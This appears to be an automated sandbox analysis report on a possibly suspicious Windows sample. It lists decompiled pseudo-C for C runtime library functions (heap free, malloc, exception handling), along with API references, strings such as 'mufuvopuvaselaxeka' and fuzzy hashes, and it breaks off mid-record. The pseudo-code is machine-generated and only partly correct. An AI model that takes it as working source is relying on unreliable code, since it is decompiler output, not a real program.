Part of subcall function 00405DA5: __EH_prolog.LIBCMT ref: 00405DAA

Part of subcall function 00406375: __EH_prolog.LIBCMT ref: 004062F5

Part of subcall function 00406F3B: __lock.LIBCMT ref: 00406F59
Part of subcall function 00406F3B: ___sbh_find_block.LIBCMT ref: 00406F64
Part of subcall function 00406F3B: ___sbh_free_block.LIBCMT ref: 00406F73
Part of subcall function 00406F3B: HeapFree.KERNEL32(00000000,00000001,00418210,0000000C,0040AEC3,00000000,004184C8,0000000C,0040AEFD,00000001,004094B5,?,0040AC99,00000004,004184A8,0000000C), ref: 00406FA3
Part of subcall function 00406F3B: GetLastError.KERNEL32(?,0040AC99,00000004,004184A8,0000000C,004101D5,00000001,004094C4,00000000,00000000,00000000,?,004094C4,00000001,00000214), ref: 00406FB4

_calloc.LIBCMT ref: 00404FF3

Part of subcall function 00406EFB: __calloc_impl.LIBCMT ref: 00406F10

Part of subcall function 00406EE5: __wcstoi64.LIBCMT ref: 00406EF1

SetCriticalSectionSpinCount.KERNEL32(?,00000000), ref: 00405022
GetTextFaceW.GDI32(00000000,00000000,?), ref: 00405045
EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 0040504E

Strings

%s %d %f, xrefs: 00404F85
mufuvopuvaselaxeka, xrefs: 00404FC8

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorH_prologLast$CountCriticalDeleteEnumFaceFileFormatsFreeHeapSectionSpinTextTime___sbh_find_block___sbh_free_block__calloc_impl__dosmaperr__lock__wcstoi64_calloc_printf
String ID: %s %d %f$mufuvopuvaselaxeka
API String ID: 865613364-3334930690
Opcode ID: 1f2e097d296a41b9d5b9a463197e56abe0b745019d18dcf072c431a4a3449ee2
Instruction ID: b5b9f6c67a5bafa29bc93e95b67dd32297b15221bad1a6ab35babe56cc14f9c1
Opcode Fuzzy Hash: 1f2e097d296a41b9d5b9a463197e56abe0b745019d18dcf072c431a4a3449ee2
Instruction Fuzzy Hash: A3218131802A196ACB11FB61ED56DEF7768EF21318B50443BF402721E1EB3C5A4ACADD

Uniqueness

Uniqueness Score: -1.00%

Function 00409CBD Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00409CBD(intOrPtr __ecx) {
				void* _t47;
				intOrPtr _t48;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_push(0x2c);
				_push(0x4183c8);
				E0040B9DC(_t47, _t54, _t56);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00406DAA(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409512(__ecx, _t53, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409512(_t48, _t53, _t61) + 0x8c));
				 *((intOrPtr*)(E00409512(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00409512(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00406E4F(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00409DE3(_t48, _t53, _t55, _t57, _t61);
				return E0040BA21( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x00409cbd
0x00409cbf
0x00409cc4
0x00409cc9
0x00409ccb
0x00409cce
0x00409cd1
0x00409cd4
0x00409cdb
0x00409cec
0x00409cfa
0x00409d08
0x00409d10
0x00409d1e
0x00409d24
0x00409d2b
0x00409d2e
0x00409d44
0x00409d47
0x00409dbc
0x00409dc3
0x00409dca
0x00409dd7

APIs

__CreateFrameInfo.LIBCMT ref: 00409CE5

Part of subcall function 00406DAA: __getptd.LIBCMT ref: 00406DB8
Part of subcall function 00406DAA: __getptd.LIBCMT ref: 00406DC6

__getptd.LIBCMT ref: 00409CEF

Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522

__getptd.LIBCMT ref: 00409CFD
__getptd.LIBCMT ref: 00409D0B
__getptd.LIBCMT ref: 00409D16
_CallCatchBlock2.LIBCMT ref: 00409D3C

Part of subcall function 00406E4F: __CallSettingFrame@12.LIBCMT ref: 00406E9B

Part of subcall function 00409DE3: __getptd.LIBCMT ref: 00409DF2
Part of subcall function 00409DE3: __getptd.LIBCMT ref: 00409E00

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: a6dfd3c0764eaa1add6de5649679d150073a72374b75e37d8ed49aff770b144c
Instruction ID: 455280d715f165e9d1458bc07a0e1b8026eeea6b72753631961bb2dec7ada048
Opcode Fuzzy Hash: a6dfd3c0764eaa1add6de5649679d150073a72374b75e37d8ed49aff770b144c
Instruction Fuzzy Hash: BA11C6B1D00209EFDF01EFA5C845AED7BB0FF44318F10806AF865A7292DB389A119F58

Uniqueness

Uniqueness Score: -1.00%

Function 00406A18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00406A18(intOrPtr _a4) {
				signed int _v16;
				char _v20;
				char _v24;
				signed int _v32;
				void* _v36;
				long _v40;
				void _v60;
				void* __edi;
				void* _t20;
				signed int _t21;
				signed int _t26;
				DWORD* _t27;
				void* _t30;
				signed int _t34;
				void* _t38;

				while(1) {
					_t20 = E0040743A(_t30, _t38, _a4);
					if(_t20 != 0) {
						break;
					}
					_t21 = E00409935(_a4);
					__eflags = _t21;
					if(_t21 == 0) {
						__eflags =  *0x557584 & 0x00000001;
						if(( *0x557584 & 0x00000001) == 0) {
							 *0x557584 =  *0x557584 | 0x00000001;
							__eflags =  *0x557584;
							E004069FD(0x557578);
							E0040990F( *0x557584, 0x415e22);
						}
						E0040526E( &_v16, 0x557578);
						_push("h@~A");
						_push( &_v16);
						L7();
						asm("int3");
						_push(0x557578);
						_push(_t38);
						_t34 = 8;
						_v36 = memcpy( &_v60, 0x401500, _t34 << 2);
						_t26 = _v16;
						_v32 = _t26;
						__eflags = _t26;
						if(_t26 != 0) {
							__eflags =  *_t26 & 0x00000008;
							if(( *_t26 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t27 =  &_v20;
						_t17 =  &_v24; // 0x406a7c
						RaiseException(_v40, _v36,  *_t17, _t27);
						return _t27;
					} else {
						continue;
					}
					L11:
				}
				return _t20;
				goto L11;
			}

0x00406a2f
0x00406a32
0x00406a3a
0x00000000
0x00000000
0x00406a25
0x00406a2b
0x00406a2d
0x00406a3e
0x00406a4a
0x00406a4c
0x00406a4c
0x00406a55
0x00406a5f
0x00406a64
0x00406a69
0x00406a6e
0x00406a76
0x00406a77
0x00406a7c
0x00406a88
0x00406a89
0x00406a8c
0x00406a97
0x00406a9a
0x00406a9e
0x00406aa2
0x00406aa4
0x00406aa6
0x00406aa9
0x00406aab
0x00406aab
0x00406aa9
0x00406ab2
0x00406ab6
0x00406abf
0x00406ac6
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a2d
0x00406a3d
0x00000000

APIs

_malloc.LIBCMT ref: 00406A32

Part of subcall function 0040743A: __FF_MSGBANNER.LIBCMT ref: 0040745D
Part of subcall function 0040743A: __NMSG_WRITE.LIBCMT ref: 00407464
Part of subcall function 0040743A: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0041018B,00000001,00000001,00000001,?,0040AE6C,00000018,004184C8,0000000C,0040AEFD), ref: 004074B1

std::bad_alloc::bad_alloc.LIBCMT ref: 00406A55

Part of subcall function 004069FD: std::exception::exception.LIBCMT ref: 00406A09

__CxxThrowException@8.LIBCMT ref: 00406A77

Strings

h@~A, xrefs: 00406A6E
xuU, xrefs: 00406A45

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
String ID: h@~A$xuU
API String ID: 3715980512-1248273695
Opcode ID: e31c1c94900ae92f0dcf41c21c44f44344b79336965c23dba0a5cc2fd3e064ee
Instruction ID: 601e2f14aee376df9ee42435a685d68e851ded8c7669ac22412a36118604ece9
Opcode Fuzzy Hash: e31c1c94900ae92f0dcf41c21c44f44344b79336965c23dba0a5cc2fd3e064ee
Instruction Fuzzy Hash: B7F0E231A0420D67CB047B21EC1298A3B689F46318B2280BFFC06B51D2EF3C9E659949

Uniqueness

Uniqueness Score: -1.00%

Function 00409A0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00409A0C(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00409512(_t23, __edx, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00409512(_t23, __edx, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E00409512(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x418468);
						E0040B9DC(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E00409512(_t23, __edx, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0040BA21(E0041030E(_t23, _t24, _t25));
					}
				}
			}

0x00409a0c
0x00409a0c
0x00409a16
0x00409a1d
0x00409a3c
0x00409a43
0x00409a4a
0x00409a4f
0x00409a4f
0x00409a4f
0x00000000
0x00409a1f
0x00409a1f
0x00409a24
0x00409a51
0x00409a51
0x00409a54
0x00409a26
0x00409a2b
0x0040a616
0x0040a618
0x0040a61d
0x0040a627
0x0040a62c
0x0040a62e
0x0040a632
0x0040a63d
0x0040a63d
0x0040a64e
0x0040a64e
0x00409a24

APIs

__getptd.LIBCMT ref: 00409A26

Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522

__getptd.LIBCMT ref: 00409A37
__getptd.LIBCMT ref: 00409A45

Strings

MOC, xrefs: 00409A18
csm, xrefs: 00409A1F

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 79edc0a518ba9469f2ba53198a8b45b6bd2c90eac2c121f6cec3718a3dc5b6f0
Instruction ID: 6254f9dd037a097689e981c217c7ad32807bda0d8fa321fad349858e9e17920d
Opcode Fuzzy Hash: 79edc0a518ba9469f2ba53198a8b45b6bd2c90eac2c121f6cec3718a3dc5b6f0
Instruction Fuzzy Hash: F3E04F362142049FCB50BB66C446B2937A4EB95318F1A40B7E40DD73A3C73CDC50AA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF13 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040DF13(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x418528);
				E0040B9DC(__ebx, __edi, __esi);
				_t31 = E00409512(__ebx, __edx, _t35);
				_t15 =  *0x42cbb4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040AEE2(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x42cab8; // 0x21c2c30
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x42c690;
								if(__eflags != 0) {
									_push(_t33);
									E00406F3B(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x42cab8; // 0x21c2c30
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x42cab8; // 0x21c2c30
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0040DFAE();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040CB0F(_t29, 0x20);
				}
				return E0040BA21(_t33);
			}

0x0040df13
0x0040df13
0x0040df13
0x0040df13
0x0040df15
0x0040df1a
0x0040df24
0x0040df26
0x0040df2e
0x0040df4f
0x0040df55
0x0040df59
0x0040df5c
0x0040df5f
0x0040df65
0x0040df67
0x0040df69
0x0040df6c
0x0040df72
0x0040df74
0x0040df76
0x0040df7c
0x0040df7e
0x0040df7f
0x0040df84
0x0040df7c
0x0040df74
0x0040df85
0x0040df8a
0x0040df8d
0x0040df93
0x0040df97
0x0040df97
0x0040df9d
0x0040dfa4
0x0040df36
0x0040df36
0x0040df36
0x0040df3b
0x0040df3f
0x0040df44
0x0040df4c

APIs

__getptd.LIBCMT ref: 0040DF1F

Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522

__amsg_exit.LIBCMT ref: 0040DF3F
__lock.LIBCMT ref: 0040DF4F
InterlockedDecrement.KERNEL32(?), ref: 0040DF6C
InterlockedIncrement.KERNEL32(021C2C30), ref: 0040DF97

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 1867fb20bf003527f7d320963a5a4876af3ba585a3dd6aef947d41df459310b5
Instruction ID: 9214df55b5cdb973349ba12c6a4523de1b58fc2de2eaee48678da7b0d1a15525
Opcode Fuzzy Hash: 1867fb20bf003527f7d320963a5a4876af3ba585a3dd6aef947d41df459310b5
Instruction Fuzzy Hash: F4016131E01612ABC721EB9A984575E7760AF44714F14817BF811777D0C73C6985CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00406F3B Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E00406F3B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x418210);
				_t8 = E0040B9DC(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0040BA21(_t8);
				}
				if( *0x55927c != 3) {
					_push(_t23);
					L7:
					if(HeapFree( *0x5575bc, 0, ??) == 0) {
						_t10 = E00407A37();
						 *_t10 = E004079F5(GetLastError());
					}
					goto L9;
				}
				E0040AEE2(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0040AF15(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040AF45();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00406F91();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x00406f3b
0x00406f3d
0x00406f42
0x00406f47
0x00406f4c
0x00406fc3
0x00406fc8
0x00406fc8
0x00406f55
0x00406f9a
0x00406f9b
0x00406fab
0x00406fad
0x00406fc0
0x00406fc2
0x00000000
0x00406fab
0x00406f59
0x00406f5f
0x00406f64
0x00406f6a
0x00406f6f
0x00406f71
0x00406f72
0x00406f73
0x00406f79
0x00406f7a
0x00406f81
0x00406f8a
0x00000000
0x00406f8c
0x00406f8c
0x00000000
0x00406f8c

APIs

__lock.LIBCMT ref: 00406F59

Part of subcall function 0040AEE2: __mtinitlocknum.LIBCMT ref: 0040AEF8
Part of subcall function 0040AEE2: __amsg_exit.LIBCMT ref: 0040AF04
Part of subcall function 0040AEE2: EnterCriticalSection.KERNEL32(004094B5,004094B5,?,0040AC99,00000004,004184A8,0000000C,004101D5,00000001,004094C4,00000000,00000000,00000000,?,004094C4,00000001), ref: 0040AF0C

___sbh_find_block.LIBCMT ref: 00406F64
___sbh_free_block.LIBCMT ref: 00406F73
HeapFree.KERNEL32(00000000,00000001,00418210,0000000C,0040AEC3,00000000,004184C8,0000000C,0040AEFD,00000001,004094B5,?,0040AC99,00000004,004184A8,0000000C), ref: 00406FA3
GetLastError.KERNEL32(?,0040AC99,00000004,004184A8,0000000C,004101D5,00000001,004094C4,00000000,00000000,00000000,?,004094C4,00000001,00000214), ref: 00406FB4

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 82d1217dc7766422609e9fd4519e9b167b1883a48651fa9a0e2391cd9c925708
Instruction ID: 834a6a4038c298237d3a83dbb6ad1ad90ecc2e8dee653c272b1303f6ac42c9c6
Opcode Fuzzy Hash: 82d1217dc7766422609e9fd4519e9b167b1883a48651fa9a0e2391cd9c925708
Instruction Fuzzy Hash: 63018471904303AEDF20AF72BC06B5E3A64AF01369F21403FF005761D1CA3C99519A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A06A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E0040A06A(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00409FD8(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00406B02(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00409A55(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E00409CBD( *((intOrPtr*)(_t22 + 0xc)));
				if(_t20 != 0) {
					E00406AC9(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x0040a06a
0x0040a06a
0x0040a06a
0x0040a06f
0x0040a073
0x0040a075
0x0040a078
0x0040a079
0x0040a07a
0x0040a07d
0x0040a082
0x0040a082
0x0040a085
0x0040a089
0x0040a08c
0x0040a091
0x0040a08e
0x0040a08e
0x0040a08e
0x0040a094
0x0040a099
0x0040a09b
0x0040a09e
0x0040a0a1
0x0040a0a2
0x0040a0aa
0x0040a0af
0x0040a0b3
0x0040a0b6
0x0040a0b9
0x0040a0bf
0x0040a0c0
0x0040a0c3
0x0040a0cd
0x0040a0d1
0x00000000
0x0040a0d1
0x0040a0d7

APIs

___BuildCatchObject.LIBCMT ref: 0040A07D

Part of subcall function 00409FD8: ___BuildCatchObjectHelper.LIBCMT ref: 0040A00E

_UnwindNestedFrames.LIBCMT ref: 0040A094
___FrameUnwindToState.LIBCMT ref: 0040A0A2

Strings

csm, xrefs: 0040A079, 0040A08E, 0040A0A1, 0040A0BF, 0040A0CF

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: f96ea05d7d615432173e952efb9fbac2433b356751b877c4f48df9a42dbdf93c
Instruction ID: 04ab747438a75b17733196539c474dde0f8660501443c1b1e6f5a2f05f0c1712
Opcode Fuzzy Hash: f96ea05d7d615432173e952efb9fbac2433b356751b877c4f48df9a42dbdf93c
Instruction Fuzzy Hash: 39014B71400209BBDF22AF51CC45EEB3F6AEF04354F048026FD1C241A1D73A99B1DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004089D1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E004089D1() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x401538;
					_v28 =  *0x401530;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x004089d6
0x004089de
0x004089f5
0x004089a1
0x004089aa
0x004089b6
0x004089b9
0x004089bc
0x004089be
0x004089c1
0x004089c6
0x004089d0
0x004089c8
0x004089cc
0x004089cc
0x004089e0
0x004089e6
0x004089ee
0x00000000
0x004089f0
0x004089f0
0x004089f4
0x004089f4
0x004089ee

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040671D), ref: 004089D6
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004089E6

Strings

KERNEL32, xrefs: 004089D1
IsProcessorFeaturePresent, xrefs: 004089E0

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 02cee7d4ee86e4cc822ed6d978d1876af1daa32e2c9aa6aef9fd0d2926bb3944
